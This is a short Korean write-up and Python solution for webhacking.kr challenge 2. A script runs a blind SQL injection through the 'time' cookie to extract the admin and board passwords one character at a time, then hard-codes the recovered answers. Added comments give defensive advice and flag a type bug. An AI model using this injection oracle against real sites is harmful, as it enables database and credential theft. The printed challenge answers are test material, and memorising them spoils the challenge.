table 이름은 게싱(guessing)으로 알아낸다.

freeboard와 admin의 password를 blind SQL injection으로 얻어낸 뒤, board에서 주는 zip 파일을 admin page에 admin 비번을 넣어 받은 비번으로 압축해제하면 key를 얻는다.


#webhacking.kr 2번 

import http.client
import urllib
import string
def inj(q: str) -> bool:
	"""Boolean oracle for the blind SQL injection used in challenge web-02.

	``q`` is appended to the ``time`` cookie after ``1487488213 and ``, so the
	server-side query evaluates ``<timestamp> and <q>``.  The function returns
	True when the response body contains ``09:00:01`` -- presumably the time the
	page renders when the injected condition holds (the oracle string is
	hard-coded; confirm against the challenge page).

	Defender's note: the injection point is a cookie value, so every header- or
	cookie-carried value must be treated as untrusted input and bound as a query
	parameter instead of being concatenated into SQL.  Detection-wise, this
	produces many requests in one session whose Cookie header carries SQL
	keywords (select/substring/ascii), which a WAF or request log review can
	flag.
	"""
	con=http.client.HTTPConnection('webhacking.kr')
	head={'Host':'webhacking.kr'}
	head['Upgrade-Insecure-Requests']=1
	# The payload rides in the Cookie header; id/PHPSESSID look like placeholder values.
	head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q
	con.request('GET','/challenge/web/web-02/',headers=head)
	r=con.getresponse().read()
	#print(r)
	# Note: the connection is never closed explicitly.
	return b'09:00:01' in r

#print(inj('(select length(password) from admin)=10;'))
arr=list(string.ascii_letters+'1234567890')  # candidate charset for each password character
print(arr)
adminpw=''  # recovered characters are accumulated here
table='admin' #FreeB0aRd
# First pass: probes position 5 only (range(5,6)) against ASCII codes 95-99.
# Each query asks the oracle "is the ASCII code of password[i] equal to a?".
for i in range(5,6):
	for a in range(95,100):
		q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';'
		print(q)
		t=inj(q)
		print(chr(a))
		print(t)
		if t:
			# NOTE(review): `a` is an int here, so this concatenation would raise
			# TypeError if the branch is ever taken.
			adminpw+=a
			print(adminpw)
			break
	
# Second pass: positions 5-10, trying every character in arr; the oracle
# confirms one character per position (substring(password,i,1)).
for i in range(5,11):
	for j, a in enumerate(arr):  # j is unused
		q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';'
		print(q)
		t=inj(q)
		print(a)
		if t:
			adminpw+=a
			print(adminpw)
			break


print(adminpw)
# Final values recorded by the author; these assignments overwrite whatever
# the loops above recovered.
adminpw='0nly_admin'
freeboardpw='7598522ae'
